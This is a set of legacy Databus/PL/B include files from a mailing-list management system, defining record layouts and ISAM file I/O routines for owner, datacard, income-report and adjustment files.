.ASPAYAD1 form 10.2 26-38 ACCOUNTS PAYABLE 1 ADJUSTMENT.
.ASPAYAD2 form 10.2 39-41 ACCOUNTS PAYABLE 2 ADJUSTMENT.
.ASPAYAD3 form 10.2 42-54 ACCOUNTS PAYABLE 3 ADJUSTMENT.
.ASLRINC form 10.2 55-67 LIST RENTAL INCOME ADJUSTMENT.
.ASNININC form 10.2 68-80 LIST RENTAL INCOME ADJUSTMENT.
..end patch 1.1
.ASREUSE DIM 1 81-81 RE-USE/RUN CHARGE CODE (1-4).
.ASCRDB DIM 1 82-82 CREDIT OR DEBIT CODE (C 0R D).
.ASADD DIM 1 83-83 CORRECTION OR ADDITIONAL BILL CODE (1 OR2).
..begin patch 1.1
..ASSTAX DIM 5 46-50 STATE TAX ADJUSTMENT.
..ASPOST DIM 4 51-54 POSTAGE ADJUSTMENT.
..ASCITY DIM 5 55-59 CITY TAX ADJUSTMENT.
.ASSTAX form 5.2 84-91 STATE TAX ADJUSTMENT.
.ASPOST form 5.2 92-99 POSTAGE ADJUSTMENT.
.ASCITY form 5.2 100-117 CITY TAX ADJUSTMENT.
..ASREASON DIM 2 60-61 ADJUSTMENT REASON CODE (1-23).
..end patch 1.1
.ASCNTCT DIM 3 118-120 CONTACT/BROKER CODE.
.ASINVNO DIM 6 121-126 INVOICE NUMBER.
..begin patch 1.1
..ASCRDTE DIM 6 71-76 CREDIT DATE MMDDYY.
..ASINDTE DIM 6 77-82 FROM INVOICE RECORD MMDDYY.
..ASAMNUM DIM 1 83-83 INVOICE AMENDMENT NUMBER.
.ASCRDTE DIM 8 127-134 CREDIT DATE CCYYMMDD
.ASINDTE DIM 8 135-142 FROM INVOICE RECORD CCYYMMDD
.ASAMNUM DIM 2 143-144 INVOICE AMENDMENT NUMBER.
..end patch 1.1
.ASTAT DIM 1 145-145 INVOICE STATUS FROM INVOICE RECORD.
.ASBLANK6 DIM 6 146-151 .
.PROGRAM ACCESS.
.NAME TYPE ACCESS
<file_sep>/include/Common.inc
. Last change: DLH 6/11/2002 10:23:04 AM
..............................................................................
.
. COMMON
.
. COMMON UDA VARIABLES
.
. Shared UDA (user data area) variables, common to all programs.
ERROR DIM *35 DATASHARE ERROR MESSAGE
TODAY DIM *8 DATE IN mm/dd/yy FORMAT
SECURITY FORM *1
FUNC DIM *2
TYPINIT DIM *2 TYPIST INITIALS
PORTN FORM *3 SOFT PORT NUMBER
AGENDAID DIM *6 AGENDA ID NUMBER
JULIAN FORM *5 TODAY IN yyjjj FORMAT
USER DIM *10 USER ID
USERNME DIM *10 USER NAME (FIRST INIT, LAST)
PRIO FORM *3 OVERALL PRIORITY LEVEL
LEVELS DIM *36 SECURITY LEVELS
COMM DIM *1 COMMUNICATION ALLOWED
.
COMPANY FORM *1 COMPANY CODE (0,1-NIN,2-PL (03/27/2007)
COMPNME DIM *24 COMPANY NAME TEXT
MULTCOS FORM *1 MULTIPLE COMPANIES ALLOWED
CURSYS FORM *1 CURRENT SYSTEM
CURLEVL FORM *1 CURRENT LEVEL WITHIN SYSTEM
MULTSYS FORM *1 MULTIPLE SYSTEMS ALLOWED
PROGRAM DIM *8 LAST PROGRAM NAME
COMMENT DIM *30
INITS DIM *3 USER INITIALS
EXIT FORM *2 EXIT ALLOWED
INPNAME DIM *25 INPUT FILE NAME
OUTNAME DIM *25 OUTFILE NAME
PRTNAME DIM *25 PRINT FILE NAME (/PRT ASSUMED)
.path DIM *45 use Path name ie \\nts0\c\data\text
.Subject dim *30
..............................................................................
<file_sep>/include/nowndd104.inc
..............................................................................
.
. NOWNDD INCLUSION
. NIN OWNER FILE DEFINITION
.
. FILE NAME : NINOWN
. REC LENGTH: 190 FIXED
. INDEX KEY : 3-6 (OWNLON)
. AIM KEY : 7-56
. 09Dec2000 Change IP address of File manager DMB
. 09Dec2000 use filelist
..10sep96 inactive code, batch code for lcr's, century - dlh
..16may95 add 2nd fax number for accounting.
..............................................................................
.
.NOWNNAME INIT "NINOWN.dat|20.20.30.104:502"
NOWNNAME INIT "NINOWN.dat|10.10.30.104:502"
NOWNFLD DIM 4 ISAM key work area (owner number, positions 3-6)
OwnFList Filelist
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|20.20.30.104:502"
NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|10.10.30.104:502"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|20.20.30.104:502"
NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|10.10.30.104:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM"
filelistend
NOWNFLE3 FILE FIXED=190 plain sequential access to the same data
NOWNFLD2 DIM 53 AIM key work area (positions 7-56 + excess byte)
NOWNFLG1 FORM 1
NOWNFLG2 FORM 1
NOWNFLG3 FORM 1
NOWNPATH FORM 1
.
. Owner record layout; position ranges below are documentation only.
ownvars list
OWNLOC DIM 1 001-001 'B'
OWNBLK DIM 1 002-002 BLANK '0' 6/10/05 Using this byte to hold Sample Info ASH
OWNLON DIM 4 003-006 OWNER NUMBER
OWNLONM DIM 25 007-031 CONTACT NAME
OWNOCPY DIM 25 032-056 COMPANY NAME
OWNLOSA DIM 25 057-081 ADDRESS
OWNLOCTY DIM 15 082-096 CITY
OWNLOS DIM 2 097-098 STATE
OWNLOZC DIM 10 099-108 ZIP CODE
OWNNEC DIM 1 109-109 NUMBER OF CARBON COPIES
OWNCTN DIM 16 110-125 CARBON COPY TO
OWNTELE DIM 10 126-135 TELEPHONE NUMBER
OWNPASS DIM 10 136-145 PERSON LAST UPDATED BY
OWNRDTE DIM 8 146-153 REVISED DATE mm,dd,cc,yy
owngally dim 1 154-154 'T'rue = lcr's get combined request
OWNTAXID DIM 15 155-169 TEFRA TAX ID CODE.
OWNFAX DIM 10 170-179 FAX NUMBER.
ownfax2 dim 10 180-189 2nd fax ie acct.
OWNstat DIM 1 190-190 BLANK, "I"nactive
listend
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/MDCMSCIO.inc
..............................................................................
.******************************************************
.* MISC List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MMSC DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing MMSC, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data not supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MMSCKEY
. REQUIRED : 'MMSCFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Opens the file on first use (MMSCFlag unset), then performs a keyed
. ISAM read into MMSCVars under a FILEPI interlock.
MMSCKEY BRANCH MMSCFlag TO MMSC1
 CALL MMSCOpen
MMSC1 FILEPI 1;MMSCFile
 READ MMSCFile,MMSCFld;MMSCVars
 RETURN
..............................................................................
.
. ENTRY POINT : MMSCTST
. REQUIRED : MMSCFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
. Keyed read into STR1 only; sets I/O flags without keeping the record.
MMSCTST BRANCH MMSCFlag TO MMSC2
 CALL MMSCOpen
MMSC2 FILEPI 1;MMSCFile
 READ MMSCFile,MMSCFld;STR1
 RETURN
..............................................................................
.
. ENTRY POINT : MMSCKS
. REQUIRED :
. RETURNED : MMSC Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MMSCKS BRANCH MMSCFlag TO MMSC3
 CALL MMSCOpen
MMSC3 FILEPI 1;MMSCFile
 READKS MMSCFile;MMSCVars
 RETURN
..............................................................................
. ENTRY POINT : MMSCSEQ
. REQUIRED :
. RETURNED : MMSC Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MMSCSEQ BRANCH MMSCFlag TO MMSC4
 CALL MMSCOpen
MMSC4 FILEPI 1;MMSCFile
 READ MMSCFile,SEQ;MMSCVars
 RETURN
..............................................................................
.
. ENTRY POINT : MMSCWRT
. REQUIRED : 'MMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
MMSCWRT BRANCH MMSCFlag TO MMSC5
 CALL MMSCOpen
MMSC5 FILEPI 1;MMSCFile
 WRITE MMSCFile,MMSCFld;MMSCVars
 RETURN
..............................................................................
.
. ENTRY POINT : MMSCUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
. Rewrites the record obtained by the most recent keyed read.
MMSCUPD BRANCH MMSCFlag TO MMSC6
 CALL MMSCOpen
MMSC6
 FILEPI 1;MMSCFile
 UPDATE MMSCFile;MMSCVars
 RETURN
..............................................................................
.
. ENTRY POINT : MMSCDEL
. REQUIRED : 'MMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MMSCDEL BRANCH MMSCFlag TO MMSC7
 CALL MMSCOpen
MMSC7 FILEPI 1;MMSCFile
 DELETE MMSCFile,MMSCFld
 RETURN
..............................................................................
.
. ENTRY POINT : MMSCOpen
. REQUIRED : 'MMSCFlag' 'MMSCPATH'
. RETURNED : 'MMSCFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. Traps I/O failure to MMSCGONE; on success marks the file open so
. the entry points above skip the open on subsequent calls.
MMSCOpen TRAP MMSCGONE giving error IF IO
 OPEN MMSCFile,MMSCName
 TRAPCLR IO
 MOVE C1 TO MMSCFlag
 RETURN
..............................................................................
. Open failed: report the missing file via the shared FILEGONE handler.
MMSCGONE MOVE MMSCNAME TO FILENAME
 CALL FILEGONE
.
..............................................................................
<file_sep>/include/LIncdd.inc
..............................................................................
.
. LIncDD INCLUSION
. NIN Income report Data Descriptors
.
. FILE NAME : ListIncome.dat
. REC LENGTH: 533 FIXED
. INDEX KEY : (1) 1-6 (List #) dupes allowed
. Record ID (2) 7-12 record ID no dupes
.INcome by List data descriptor
.used for List management income reporting to Owners
.
.
.
LincFLIST Filelist
LIncFILE IFILE KEYLEN=6,FIXED=533,Name="ListIncome.ISI|NINS1:502"
LIncFILE1 IFILE KEYLEN=6,FIXED=533,noduplicates,Name="ListIncome1.ISI|NINS1:502"
Filelistend
LIncNAME INIT "ListIncome.ISI|NINS1:502"
LIncNAME1 INIT "ListIncome1.ISI|NINS1:502"
LIncFLD DIM 6 key work area, index 1 (list number, dupes allowed)
LIncFLD1 DIM 6 key work area, index 2 (unique record ID)
LIncFLAG FORM 1 non-zero once the filelist has been opened
LincPath Form 1
. Income-report record layout; position ranges are documentation only.
LIncVARS LIST
LIncList DIM 6 1-6 .list number
LincREcID Dim 6 7-12 .unique record ID
LINCDATEBY DIM 1 13-13 'M' by Mail date, 'O' by Order date
LIncTYPE DIM 1 14-14 Basis 'C' Cash, 'I' Invoice
. 2 Records required if Both Cash & Accrual
LMONTH FORM 2 15-16 Fiscal Month '1-12'
LIncREP1 DIM 1 17-17 Report option 1 Type 'M' Monthly, 'Q' Quarterly,
. 2 Records required if Both monthly & quarterly
LIncREP2 DIM 1 18-18 Report option 2 report with projections 'Y' = Include Variance
LIncREP3 DIM 1 19-19 Report option 3 Not used
.LIncYEAR FORM 4 20-23 Beginning year for report (drop data prior to being our list)
LIncYEAR FORM 8 20-27 Beginning year for report (drop data prior to being our list) ccyymmdd
LIncRECIPIENT DIM 255 28-282 Email address of recipient
LIncAuto DIm 1 283-283 "Y" if report runs auto
LIncInits dim 3 284-286 Last updated by
LIncCOMMENTS DIM 247 287-533 not used
listend
<file_sep>/include/SRDSSELDD.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE: SRDS_SEL
. LENGTH: FIXED=140
. COMPRESS: NONE
. TYPE:
......................................................
. LAST MODIFIED
. 10 MAy 2011 DLH New
......................................................
SRDSSELNAME Init "SRDS_SEL.Isi|NINS1:502"
SRDSSELFlist Filelist
SRDSSELFILE IFILE Keylen=6,Fixed=140,Name="SRDS_SEL.Isi|NINS1:502"
SRDSSELFiLE2 IFILE Keylen=10,Fixed=140,Name="SRDS_SEL2.Isi|NINS1:502"
FileListEnd
SRDSSELSFILE FILE plain sequential access
SRDSSELFLAG FORM 1 non-zero once the filelist has been opened
SRDSSELPATH FORM 1
SRDSSELFld Dim 6 .list number
SRDSSELFld2 Dim 10 .list number & select number
.
. Select record layout; position ranges below are documentation only.
SRDSSELVARS List
SRDSSELLIST DIM 6 1-6 LIST NUMBER
SRDSSELNUM DIM 4 7-10 SELECT NUMBER
SRDSSELSNAME DIM 75 11-85 SELECT NAME
SRDSSELQTY DIM 10 86-95 SELECT QUANTITY
SRDSSELPRICE FORM 5.2 96-103 SELECT CODE PRICE
SRDSSELPCOMM DIM 1 104-104 SELECT PRICE IS COMMISSIONABLE
SRDSSELDESC DIM 3 105-107 SELECT PRICE MODIFIER
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
SRDSSELINACTIVE DIM 1 108-108 SELECT INACTIVE? 1 = YES
SRDSSELSTATUS DIM 1 109-109 SELECT STATUS
. 1 = SPECIAL(DOES NOT PRINT ON DATACARD)
. 2 = OFFICE USE ONLY
. 3 =
.
SRDSSELNOTES DIM 1 110-110 1 = INDICATES USER SHOULD VIEW NOTES ABOUT THIS SELECT
SRDSSELEXC DIM 1 111-111 1 = Exc/Rent, 2 = Exchange Only, 3 = Rental Only
SRDSSELBASE DIM 4 112-115 SELECT NUMBER OF ASSOCIATED BASE - BASE RECORDS WILL HOLD BLANK VALUE!!
. BASE = BASE - ONLY ONE PER DATACARD
. SEC. = SECONDARY BASE
. Nxxx = NUMBER OF BASE/SECONDARY BASE
. " " = NEITHER BASE NOR SELECT OFF OF BASE
SRDSSELINDEX DIM 4 116-119 INDEX FOR PRINTING/DISPLAY
SRDSSELDATE DIM 8 120-127 SELECT DATE
SRDSSELINIT DIM 3 128-130 USER INITIALS
SRDSSELFILLER DIM 10 131-140 FILLER
LISTEND
<file_sep>/include/ntxt1io.inc
..............................................................................
.
. Ntxt1IO INCLUSION
. NIN DATACARD TEXT FILE I/O ROUTINES
.
. FILE NAME : NINtxt1
. REC LENGTH: 510 VAR
. INDEX KEY : 1-9 (6 BYTE LIST NUMBER + 3 BYTE RECORD #)
.
..............................................................................
.
. ENTRY POINT : Ntxt1KEY
. REQUIRED : 'Ntxt1FLD'
. RETURNED : DATACARD TEXT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Ntxt1pATH selects which index file serves the read: path 1 uses
. Ntxt1FILE/Ntxt1FLD, path 2 uses Ntxt1FLE1/Ntxt1FLD1.
Ntxt1KEY Branch Ntxt1pATH OF NTXT11A,NTXT11C
NTXT11A BRANCH Ntxt1FLAG,Ntxt11B
 CALL Ntxt1OPEN
Ntxt11B
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FILE
 READ Ntxt1FILE,Ntxt1FLD;Ntxt1VARS
 trapclr IO
 RETURN
NTXT11C BRANCH Ntxt1FLAG,Ntxt11d
 CALL Ntxt1OPEN
Ntxt11D
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FLE1
 READ Ntxt1FLE1,Ntxt1FLD1;Ntxt1VARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1TST
. REQUIRED : Ntxt1FLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
. Keyed read with an empty receive list; only sets the I/O flags.
Ntxt1TST Branch Ntxt1pATH OF NTXT12A,NTXT12C
Ntxt12A BRANCH Ntxt1FLAG,Ntxt12B
 CALL Ntxt1OPEN
Ntxt12B
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FILE
 READ Ntxt1FILE,Ntxt1FLD;;
 trapclr IO
 RETURN
Ntxt12C BRANCH Ntxt1FLAG,Ntxt12D
 CALL Ntxt1OPEN
Ntxt12d
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FLE1
 READ Ntxt1FLE1,Ntxt1FLD1;;
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1KS
. REQUIRED :
. RETURNED : DATACARD TEXT RECORD
. DESCRIPTION : KEY SEQUENTIAL DATACARD TEXT FILE READ
.
Ntxt1KS Branch Ntxt1pATH OF NTXT13A,NTXT13C
NTXT13A
 BRANCH Ntxt1FLAG,Ntxt13B
 CALL Ntxt1OPEN
Ntxt13B
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FILE
 READKS Ntxt1FILE;Ntxt1VARS
 trapclr IO
 RETURN
NTXT13C
 BRANCH Ntxt1FLAG,Ntxt13D
 CALL Ntxt1OPEN
Ntxt13D
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FLE1
 READKS Ntxt1FLE1;Ntxt1VARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1SEQ
. REQUIRED :
. RETURNED : DATACARD TEXT RECORD
. DESCRIPTION : SEQUENTIAL DATACARD TEXT FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. NOTE(review): unlike the entry points above, this one does not branch
. on Ntxt1pATH and always reads Ntxt1FILE - confirm this is intended.
Ntxt1SEQ
 BRANCH Ntxt1FLAG,Ntxt14
 CALL Ntxt1OPEN
Ntxt14
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FILE
 READ Ntxt1FILE,SEQ;Ntxt1VARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1WRT
. REQUIRED : 'Ntxt1FLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY txt1/ISI INSERT
.
. Writes through the filelist so every index stays in step.
Ntxt1WRT
 BRANCH Ntxt1FLAG,Ntxt15
 CALL Ntxt1OPEN
Ntxt15
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FLIST
 WRITE Ntxt1FLIST;Ntxt1VARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1UPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
.
Ntxt1UPD
 BRANCH Ntxt1FLAG,Ntxt16
 CALL Ntxt1OPEN
Ntxt16
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FLIST
 UPDATE Ntxt1FLIST;Ntxt1VARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1DEL
. REQUIRED : 'Ntxt1FLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY txt1/ISI DELETE
.
Ntxt1DEL
 BRANCH Ntxt1FLAG,Ntxt17
 CALL Ntxt1OPEN
Ntxt17
 trap IOMssg giving Error if IO
 FILEPI 1;Ntxt1FLIST
 DELETE Ntxt1FLIST
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : Ntxt1OPEN
. REQUIRED : 'Ntxt1FLAG'
. RETURNED : 'Ntxt1FLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN DATACARD TEXT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
Ntxt1OPEN
 TRAP Ntxt1GONE giving Error if IO
 OPEN Ntxt1FLIST .,EXCLUSIVE
 trapclr IO
 MOVE C1,Ntxt1FLAG
 RETURN
.
. Open failed: report the missing file via the shared FILEGONE handler.
Ntxt1GONE
 MOVE Ntxt1NAME,FILENAME
 CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/NDatCntio.inc
..............................................................................
.
.
. NIN datacard / Min CNT info FILE I/O ROUTINES
.
.
. FILE NAME : NINdatCnt
. REC LENGTH: 120 FIXED
..............................................................................
.
. ENTRY POINT : NdatCntKEY
. REQUIRED : 'NdatCntFLD'
. RETURNED : OWNER RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Opens the filelist on first use, then keyed ISAM read into
. NDatCntvars under a FILEPI interlock.
NdatCntKEY BRANCH NdatCntFlag TO NdatCnt1
 CALL NdatCntOPEN
NdatCnt1 FILEPI 1;NdatCntFLE1
 READ NdatCntFLE1,NdatCntFLD;NDatCntvars
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntTST
. REQUIRED : NdatCntFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
. Keyed read into STR1 only; sets I/O flags without keeping the record.
NdatCntTST BRANCH NdatCntFlag TO NdatCnt2
 CALL NdatCntOPEN
NdatCnt2 FILEPI 1;NdatCntFLE1
 READ NdatCntFLE1,NdatCntFLD;STR1
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntKS
. REQUIRED :
. RETURNED : OWNER RECORD
. DESCRIPTION : KEY SEQUENTIAL OWNER FILE READ
.
NdatCntKS BRANCH NdatCntFlag TO NdatCnt3
 CALL NdatCntOPEN
NdatCnt3 FILEPI 1;NdatCntFLE1
 READKS NdatCntFLE1;NDatCntvars
 RETURN
..............................................................................
. ENTRY POINT : NdatCntSEQ
. REQUIRED :
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
NdatCntSEQ
 BRANCH NdatCntFlag TO NdatCnt4
 CALL NdatCntOPEN
NdatCnt4 FILEPI 1;NdatCntFLE1
 READ NdatCntFLE1,SEQ;NDatCntvars
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntWRT
. REQUIRED : 'NdatCntFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
. Writes through the filelist so every index stays in step.
NdatCntWRT BRANCH NdatCntFlag TO NdatCnt5
 CALL NdatCntOPEN
NdatCnt5 FILEPI 1;NdatCntFLE1
 WRITE NDatCntFList;NDatCntvars
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE OWNER FILE
.
. NOTE(review): no FILEPI interlock here, unlike the sibling entry
. points in this include - confirm this is intentional.
NdatCntUPD BRANCH NdatCntFlag TO NdatCnt6
 CALL NdatCntOPEN
NdatCnt6
 UPDATE NDatCntFList;NDatCntvars
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntDEL
. REQUIRED : 'NdatCntFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NdatCntDEL BRANCH NdatCntFlag TO NdatCnt7
 CALL NdatCntOPEN
NdatCnt7 FILEPI 1;NdatCntFLE1
 DELETE NDatCntFList
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntAIM
. REQUIRED : NdatCntFLD2
. RETURNED : OWNER RECORD
. DESCRIPTION : AIM OWNER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
. Associative (AIM) read against the secondary file NdatCntFLE2.
NdatCntAIM BRANCH NdatCntFlag TO NdatCnt8
 CALL NdatCntOpen
NdatCnt8 FILEPI 1;NdatCntFLE2
 READ NdatCntFLE2,NdatCntFLD2;NDatCntvars
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : OWNER RECORD
. DESCRIPTION : AIM KEY GENERIC OWNER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NdatCntKG BRANCH NdatCntFlag TO NdatCnt10
 CALL NdatCntOpen
NdatCnt10 FILEPI 1;NdatCntFLE2
 READKG NdatCntFLE2;NDatCntvars
 RETURN
..............................................................................
.
. ENTRY POINT : NdatCntKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : OWNER RECORD
. DESCRIPTION : KEY GENERIC PRIOR OWNER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NdatCntKGP BRANCH NdatCntFlag TO NdatCnt11
 CALL NdatCntOpen
NdatCnt11 FILEPI 1;NdatCntFLE2
 READKGP NdatCntFLE2;NDatCntvars
 RETURN
...............................................................................
.
. ENTRY POINT : NdatCntOPEN
. REQUIRED : 'NdatCntFlag' 'NdatCntPATH'
. RETURNED : 'NdatCntFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN OWNER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NdatCntOPEN
 TRAP NdatCntGONE giving error IF IO
 OPEN NDatCntFList
 TRAPCLR IO
 MOVE C1 TO NdatCntFlag
 RETURN
..............................................................................
. Open failed: report the missing file via the shared FILEGONE handler.
NdatCntGONE MOVE NdatCntNAME TO FILENAME
 CALL FILEGONE
.
..............................................................................
<file_sep>/include/Infodd.inc
include common.inc
include cons.inc
include norddd.inc
include nmlrdd.inc
include nmlr2dd.inc
include nxrfdd.inc
include nbrkdd.inc
include nbrk2dd.inc
include ndatdd.inc
include nrtndd.inc
include nmdldd.inc
include nusedd.inc
.Pointers to Objects
. GUI object pointers - assigned elsewhere before use.
InfoWindPtr Window ^
InfoEditPtr EditText ^
InfoEditPtr1 EditText ^
.Actual Objects
InfoListView ListView
InfoEditText EditText
. Generic pointers to character (Dim) and numeric (Form) variables.
DimPtr Dim ^
DimPtr1 Dim ^
DimPtr2 Dim ^
DimPtr3 Dim ^
FrmPtr Form ^
.
. Work variables for screen geometry and mouse handling.
OrderInfoString dim 47
ScrRight form 4
ScrBottom form 4
MouseForm form 10
FarRight form 4
FarBottom form 4
T1 form 4
L1 form 4
include nordio.inc
include nmlrio.inc
include nmlr2io.inc
include nxrfio.inc
include nbrkio.inc
include nbrk2io.inc
include ndatio.inc
include nrtnio.inc
include nmdlio.inc
include nuseio.inc
include comlogic.inc
<file_sep>/DEVELOP/CatCodes/ndatdd.inc
******************************************************
* DATACARD FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER DATACARD FILE.
* ****************************************************
.
. FILE: NINDAT
. LENGTH: 600
. COMPRESS: NONE
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
.AIMDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
. 14-19 DATFUL
. 1-1 STATUS
. 32-32 NEW BYTE
. 33-33 EXCLUSIVE BYTE
......................................................
. LAST MODIFIED
. patch 1.3 29JUNE2006 DMS - Add search, as per 6/12/2006 CTF Meeting
. patch 1.2 21JUNE2006 ASH - Added aamdex for Fulfillment Number
. - 06Jul04 DLH Added NDatLUsage
. - 29Jul02 ASH Began conversion Process
;Secondary FIles See
; include ntxtdd.inc - DATACARD TEXT FILE
; include nadddd.inc - address codes
; include narrdd.inc - Arrangement codes
; include ncatdd.inc - CATEGORY FILE DESCRIPTOR.
; include NSLTdd.inc - SELECTION CODE FILE DESCRIPTOR.
; include nsrcdd.inc - SOURCE CODE FILE DESCRIPTOR.
; include nmoddd.inc - PRICE MODIFIER FILE DESCRIPTOR.
. include nusedd.inc - VARIaBLES MODULE FOR DATABUS PORT/USER IDENTIFICATION.
.
. - 18JUN2005 DMB IP Address changed for File Manager
. - 06Apr2005 ASH Modifed COMMPER
. - 15Nov95 DLH add key by name
. - 12/10/85 ADDED ONE BYTE TO EACH CATEGORY CODE, DELETED
. BLANK8. RECORD SIZE NOW VARIABLE TO MAX 2813.
......................................................
NDATNAME DIM 8 active file name (set from one of the NDATNMEx below)
NDATNME1 INIT "NINDAT "
NDATNME2 INIT "NINDAT "
NDATNME3 INIT "NINDAT4 " 3 is used for tdmc info (argh)
NDATFLIST FILELIST
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|20.20.30.103:502"
.START PATCH 1.2.8 REPLACED LOGIC
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|10.10.30.103:502"
..NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI|20.20.30.103:502"
.NDATFLE3 IFILE KEYLEN=75,FIXED=600,Name="NINDAT4.ISI|10.10.30.103:502"
..NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|20.20.30.103:502"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|10.10.30.103:502"
NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI"
NDATFLE3 IFILE KEYLEN=75,FIXED=600,Name="NINDAT4.ISI"
NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM"
.END PATCH 1.2.8 REPLACED LOGIC
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI"
.NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM"
FILELISTEND
NDATLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
. Key work areas for the various indexes/AIM lookups.
NDATFLD DIM 6
NDATFLD1 DIM 9
NDATFLD2 DIM 78
NDATFLD3 DIM 75
.START PATCH 1.2 ADDED LOGIC
NDATFLD4 DIM 9
.END PATCH 1.2 ADDED LOGIC
.START PATCH 1.3 ADDED LOGIC
NDATFLD5 DIM 4
NDATFLD6 DIM 4
NDATFLD7 DIM 4
.END PATCH 1.3 ADDED LOGIC
